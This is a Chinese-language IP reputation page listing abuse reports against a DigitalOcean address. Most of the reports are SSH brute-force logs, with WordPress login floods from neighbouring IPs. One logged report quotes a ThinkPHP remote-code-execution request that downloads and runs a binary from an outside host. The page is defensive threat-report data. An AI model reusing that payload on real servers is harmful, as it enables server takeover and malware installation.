142.93.214.20 - IPInfo

基本信息:

城市(city): Bengaluru

省份(region): Karnataka

国家(country): India

运营商(isp): DigitalOcean LLC

主机名(hostname): unknown

机构(organization): DigitalOcean, LLC

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackbotsspam	Unauthorized connection attempt detected from IP address 142.93.214.20 to port 2220 [J]	2020-02-03 05:47:36
attack	Unauthorized connection attempt detected from IP address 142.93.214.20 to port 2220 [J]	2020-02-02 14:14:06
attackspambots	SSH Brute-Force attacks	2020-01-11 23:01:06
attackspambots	2019-12-24T19:42:47.691176shield sshd\[17651\]: Invalid user manjul from 142.93.214.20 port 41604 2019-12-24T19:42:47.695731shield sshd\[17651\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 2019-12-24T19:42:49.483794shield sshd\[17651\]: Failed password for invalid user manjul from 142.93.214.20 port 41604 ssh2 2019-12-24T19:45:30.306333shield sshd\[18230\]: Invalid user 123456 from 142.93.214.20 port 36402 2019-12-24T19:45:30.311080shield sshd\[18230\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20	2019-12-25 06:50:31
attackspambots	Brute-force attempt banned	2019-12-21 17:28:08
attackspam	SSH brute-force: detected 10 distinct usernames within a 24-hour window.	2019-12-21 05:15:01
attack	Dec 19 17:35:42 sd-53420 sshd\[18450\]: User root from 142.93.214.20 not allowed because none of user's groups are listed in AllowGroups Dec 19 17:35:42 sd-53420 sshd\[18450\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 user=root Dec 19 17:35:44 sd-53420 sshd\[18450\]: Failed password for invalid user root from 142.93.214.20 port 36492 ssh2 Dec 19 17:41:48 sd-53420 sshd\[20750\]: User root from 142.93.214.20 not allowed because none of user's groups are listed in AllowGroups Dec 19 17:41:48 sd-53420 sshd\[20750\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 user=root ...	2019-12-20 03:54:45
attackspam	SSH Bruteforce attempt	2019-12-16 14:10:34
attackspam	Dec 10 22:36:35 server sshd\[31964\]: Invalid user guest from 142.93.214.20 Dec 10 22:36:35 server sshd\[31964\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Dec 10 22:36:37 server sshd\[31964\]: Failed password for invalid user guest from 142.93.214.20 port 57346 ssh2 Dec 10 22:43:41 server sshd\[1288\]: Invalid user tanja from 142.93.214.20 Dec 10 22:43:41 server sshd\[1288\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 ...	2019-12-11 07:16:23
attackbotsspam	Dec 6 10:07:04 root sshd[13156]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Dec 6 10:07:06 root sshd[13156]: Failed password for invalid user test from 142.93.214.20 port 43690 ssh2 Dec 6 10:13:25 root sshd[13340]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 ...	2019-12-06 17:17:54
attack	Invalid user hilliary from 142.93.214.20 port 41734	2019-11-26 16:49:53
attackspambots	Brute-force attempt banned	2019-11-19 03:35:00
attackspam	Invalid user guest from 142.93.214.20 port 45864	2019-11-11 22:14:33
attackspam	Nov 10 09:35:09 web9 sshd\[14364\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 user=root Nov 10 09:35:12 web9 sshd\[14364\]: Failed password for root from 142.93.214.20 port 52310 ssh2 Nov 10 09:41:58 web9 sshd\[15476\]: Invalid user from 142.93.214.20 Nov 10 09:41:58 web9 sshd\[15476\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Nov 10 09:42:00 web9 sshd\[15476\]: Failed password for invalid user from 142.93.214.20 port 33376 ssh2	2019-11-11 03:52:19
attackspambots	Nov 8 07:22:30 minden010 sshd[10581]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Nov 8 07:22:32 minden010 sshd[10581]: Failed password for invalid user All from 142.93.214.20 port 45216 ssh2 Nov 8 07:26:46 minden010 sshd[11427]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 ...	2019-11-08 17:57:21
attack	Oct 30 19:03:12 auw2 sshd\[1383\]: Invalid user vg from 142.93.214.20 Oct 30 19:03:12 auw2 sshd\[1383\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Oct 30 19:03:13 auw2 sshd\[1383\]: Failed password for invalid user vg from 142.93.214.20 port 44948 ssh2 Oct 30 19:07:43 auw2 sshd\[1809\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 user=root Oct 30 19:07:45 auw2 sshd\[1809\]: Failed password for root from 142.93.214.20 port 54480 ssh2	2019-10-31 14:52:31
attack	Tried sshing with brute force.	2019-10-29 06:43:52
attack	Oct 24 07:53:20 vps01 sshd[3128]: Failed password for root from 142.93.214.20 port 59910 ssh2	2019-10-24 18:45:20
attackbots	SSH invalid-user multiple login try	2019-10-24 06:45:56
attackspam	Oct 20 11:36:44 ws19vmsma01 sshd[226631]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Oct 20 11:36:45 ws19vmsma01 sshd[226631]: Failed password for invalid user duffy from 142.93.214.20 port 36874 ssh2 ...	2019-10-21 03:39:54
attack	Jan 20 22:26:14 odroid64 sshd\[13571\]: Invalid user teampspeak from 142.93.214.20 Jan 20 22:26:14 odroid64 sshd\[13571\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Jan 20 22:26:16 odroid64 sshd\[13571\]: Failed password for invalid user teampspeak from 142.93.214.20 port 56690 ssh2 Feb 2 01:13:49 odroid64 sshd\[11470\]: Invalid user ansible from 142.93.214.20 Feb 2 01:13:49 odroid64 sshd\[11470\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Feb 2 01:13:51 odroid64 sshd\[11470\]: Failed password for invalid user ansible from 142.93.214.20 port 44756 ssh2 Mar 2 11:42:42 odroid64 sshd\[28395\]: Invalid user web1 from 142.93.214.20 Mar 2 11:42:42 odroid64 sshd\[28395\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Mar 2 11:42:43 odroid64 sshd\[28395\]: Failed password for invalid user web1 from 142.93. ...	2019-10-18 00:45:55
attackspam	Oct 13 14:45:18 web8 sshd\[2852\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 user=root Oct 13 14:45:20 web8 sshd\[2852\]: Failed password for root from 142.93.214.20 port 50598 ssh2 Oct 13 14:50:00 web8 sshd\[5180\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 user=root Oct 13 14:50:02 web8 sshd\[5180\]: Failed password for root from 142.93.214.20 port 33922 ssh2 Oct 13 14:54:43 web8 sshd\[7408\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 user=root	2019-10-13 22:56:51
attack	Oct 2 05:54:00 icinga sshd[387]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Oct 2 05:54:01 icinga sshd[387]: Failed password for invalid user rodrigo from 142.93.214.20 port 54088 ssh2 ...	2019-10-02 12:55:53
attackspam	Sep 7 13:21:35 wbs sshd\[21545\]: Invalid user temp from 142.93.214.20 Sep 7 13:21:35 wbs sshd\[21545\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Sep 7 13:21:37 wbs sshd\[21545\]: Failed password for invalid user temp from 142.93.214.20 port 45250 ssh2 Sep 7 13:26:34 wbs sshd\[21956\]: Invalid user support from 142.93.214.20 Sep 7 13:26:34 wbs sshd\[21956\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20	2019-09-08 10:45:01
attack	Aug 22 12:35:55 hanapaa sshd\[28447\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 user=root Aug 22 12:35:57 hanapaa sshd\[28447\]: Failed password for root from 142.93.214.20 port 40530 ssh2 Aug 22 12:40:46 hanapaa sshd\[29019\]: Invalid user ioana from 142.93.214.20 Aug 22 12:40:46 hanapaa sshd\[29019\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Aug 22 12:40:48 hanapaa sshd\[29019\]: Failed password for invalid user ioana from 142.93.214.20 port 58144 ssh2	2019-08-23 06:58:37
attackspambots	2019-08-10T22:34:23.780928abusebot-4.cloudsearch.cf sshd\[21033\]: Invalid user backup from 142.93.214.20 port 37452	2019-08-11 06:50:47
attackspambots	Jul 14 19:34:51 OPSO sshd\[21427\]: Invalid user ts from 142.93.214.20 port 37488 Jul 14 19:34:51 OPSO sshd\[21427\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Jul 14 19:34:52 OPSO sshd\[21427\]: Failed password for invalid user ts from 142.93.214.20 port 37488 ssh2 Jul 14 19:40:58 OPSO sshd\[22167\]: Invalid user kang from 142.93.214.20 port 37144 Jul 14 19:40:58 OPSO sshd\[22167\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20	2019-07-15 01:53:59
attackbots	Apr 30 15:45:17 server sshd\[156641\]: Invalid user update from 142.93.214.20 Apr 30 15:45:17 server sshd\[156641\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Apr 30 15:45:19 server sshd\[156641\]: Failed password for invalid user update from 142.93.214.20 port 40936 ssh2 ...	2019-07-12 04:55:52
attackspambots	Jul 5 14:05:10 * sshd[25599]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.214.20 Jul 5 14:05:12 * sshd[25599]: Failed password for invalid user manager from 142.93.214.20 port 49640 ssh2	2019-07-05 21:58:14
attackbotsspam	SSH Brute-Force reported by Fail2Ban	2019-06-27 17:58:25

相同子网IP讨论:

IP	类型	评论内容	时间
142.93.214.130	attackbots	Nov 4 07:19:07 tux postfix/smtpd[16855]: connect from unknown[142.93.214.130] Nov 4 07:19:08 tux postfix/smtpd[16855]: Anonymous TLS connection established from unknown[142.93.214.130]: TLSv1.2 whostnameh cipher AECDH-AES256-SHA (256/256 bhostnames) Nov x@x Nov x@x Nov 4 07:19:11 tux postfix/smtpd[16855]: 5AF49B0001: client=unknown[142.93.214.130] Nov 4 07:19:11 tux postfix/smtpd[16855]: disconnect from unknown[142.93.214.130] ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=142.93.214.130	2019-11-04 21:36:47
142.93.214.242	attack	Automatic report - Banned IP Access	2019-07-18 20:09:45
142.93.214.242	attack	[munged]::80 142.93.214.242 - - [13/Jul/2019:06:32:27 +0200] "POST /[munged]: HTTP/1.1" 403 3925 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" [munged]::80 142.93.214.242 - - [13/Jul/2019:06:32:34 +0200] "POST /[munged]: HTTP/1.1" 403 3925 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"	2019-07-13 12:45:55
142.93.214.242	attackspam	WordPress brute force	2019-07-12 20:12:27
142.93.214.242	attack	Automatic report - Web App Attack	2019-07-06 06:09:50
142.93.214.242	attackbots	142.93.214.242 - - [28/Jun/2019:07:11:51 +0200] "GET /wp-login.php HTTP/1.1" 200 1237 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.214.242 - - [28/Jun/2019:07:11:52 +0200] "POST /wp-login.php HTTP/1.1" 200 1632 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.214.242 - - [28/Jun/2019:07:11:53 +0200] "GET /wp-login.php HTTP/1.1" 200 1237 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.214.242 - - [28/Jun/2019:07:11:54 +0200] "POST /wp-login.php HTTP/1.1" 200 1607 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.214.242 - - [28/Jun/2019:07:11:59 +0200] "GET /wp-login.php HTTP/1.1" 200 1237 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 142.93.214.242 - - [28/Jun/2019:07:12:01 +0200] "POST /wp-login.php HTTP/1.1" 200 1608 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2019-06-28 16:53:38
142.93.214.242	attackbots	wp brute-force	2019-06-23 17:05:40
142.93.214.167	attack	142.93.214.167 - - [16/Apr/2019:06:00:02 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 301 194 "-" "python-requests/2.12.4" 142.93.214.167 - - [16/Apr/2019:06:00:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 404 209 "-" "python-requests/2.12.4" 142.93.214.167 - - [16/Apr/2019:06:00:06 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 301 194 "-" "python-requests/2.12.4" 142.93.214.167 - - [16/Apr/2019:06:00:08 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://104.248.57.105/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20x86 HTTP/1.1" 404 209 "-" "python-requests/2.12.4"	2019-04-16 06:28:55

WHOIS信息:

DIG信息:


; <<>> DiG 9.10.3-P4-Ubuntu <<>> 142.93.214.20
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36298
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;142.93.214.20.			IN	A

;; AUTHORITY SECTION:
.			1268	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019040701 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: 67.207.67.3#53(67.207.67.3)
;; WHEN: Mon Apr 08 03:29:29 +08 2019
;; MSG SIZE  rcvd: 117

HOST信息:

Host 20.214.93.142.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		67.207.67.3
Address:	67.207.67.3#53

** server can't find 20.214.93.142.in-addr.arpa: NXDOMAIN

IP	类型	评论内容	时间
20.185.224.24	attackbotsspam	Mail/25/465/587-993/995 Probe, Reject, BadAuth, Hack, SPAM -	2020-06-04 02:31:28
222.186.175.182	attackspam	Jun 3 20:26:56 santamaria sshd\[22565\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.182 user=root Jun 3 20:26:58 santamaria sshd\[22565\]: Failed password for root from 222.186.175.182 port 24780 ssh2 Jun 3 20:27:14 santamaria sshd\[22567\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.182 user=root ...	2020-06-04 02:31:50
37.230.189.22	attackbots	firewall-block, port(s): 445/tcp	2020-06-04 01:56:16
60.165.104.11	attackbots	...	2020-06-04 02:03:48
182.61.2.67	attack	Unauthorised connection attempt detected at AUO FR1 NODE2. System is sshd. Protected by AUO Stack Web Application Firewall (WAF)	2020-06-04 02:12:15
62.98.34.77	attackbots	Automatic report - Port Scan Attack	2020-06-04 02:16:49
159.89.52.205	attack	159.89.52.205 - - [03/Jun/2020:16:45:17 +0100] "POST /wp-login.php HTTP/1.1" 200 1861 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 159.89.52.205 - - [03/Jun/2020:16:45:18 +0100] "POST /wp-login.php HTTP/1.1" 200 1839 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 159.89.52.205 - - [03/Jun/2020:16:45:18 +0100] "POST /xmlrpc.php HTTP/1.1" 403 219 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2020-06-04 02:08:53
116.240.127.128	attackbots	AbusiveCrawling	2020-06-04 02:10:38
43.225.151.252	attack	Jun 3 19:28:47 srv sshd[21104]: Failed password for root from 43.225.151.252 port 44098 ssh2	2020-06-04 02:02:40
8.30.197.230	attackspambots	(sshd) Failed SSH login from 8.30.197.230 (US/United States/-): 2 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Jun 3 15:03:30 ubnt-55d23 sshd[12781]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=8.30.197.230 user=root Jun 3 15:03:32 ubnt-55d23 sshd[12781]: Failed password for root from 8.30.197.230 port 42742 ssh2	2020-06-04 01:58:30
185.104.71.76	attackspam	xmlrpc attack	2020-06-04 02:08:32
51.178.78.154	attackbots	ET CINS Active Threat Intelligence Poor Reputation IP group 37 - port: 636 proto: TCP cat: Misc Attack	2020-06-04 02:02:08
51.38.126.75	attackspam	SSH auth scanning - multiple failed logins	2020-06-04 02:04:02
41.67.137.243	attackspam	firewall-block, port(s): 6238/tcp	2020-06-04 02:01:36
95.217.218.140	attack	Automatic report - XMLRPC Attack	2020-06-04 02:14:11

最近上报的IP列表

148.251.43.87	34.208.139.143	202.75.62.141	103.113.3.170
40.122.104.245	144.202.56.52	181.215.89.98	159.203.170.196
120.31.140.51	92.60.235.14	61.191.130.198	218.60.28.126
142.93.124.66	139.199.100.110	1.20.99.123	94.156.222.135
112.197.172.233	185.193.24.226	180.250.18.136	188.170.173.236